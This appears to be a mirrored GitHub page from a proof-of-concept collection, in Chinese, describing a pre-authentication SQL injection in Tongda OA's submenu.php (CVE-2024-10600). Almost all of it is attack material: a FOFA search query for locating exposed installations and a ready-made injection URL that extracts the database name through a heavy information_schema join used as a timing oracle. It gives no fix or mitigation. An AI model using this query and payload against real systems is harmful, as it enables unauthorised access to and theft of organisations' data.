mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
29 lines
726 B
Markdown
29 lines
726 B
Markdown
![]() |
# 通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600)
|
||
|
|
||
|
pda/appcenter/submenu.php 未包含inc/auth.inc.php且 $appid 参数未用'包裹导致前台SQL注入
|
||
|
|
||
|
## 影响范围
|
||
|
|
||
|
v2017-v11.6
|
||
|
|
||
|
## fofa
|
||
|
|
||
|
```javascript
|
||
|
app="TDXK-通达OA" && icon_hash="-759108386"
|
||
|
```
|
||
|
|
||
|
## poc
|
||
|
|
||
|
```javascript
|
||
|
http://192.168.0.106/pda/appcenter/submenu.php?appid=1%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)
|
||
|
```
|
||
|
|
||
|

|
||
|
|
||
|
|
||
|
|
||
|
## 漏洞来源
|
||
|
|
||
|
- https://github.com/LvZCh/td/issues/3
|
||
|
- https://mp.weixin.qq.com/s/TL1QWIpSpnrqcJ4rTXTTdQ
|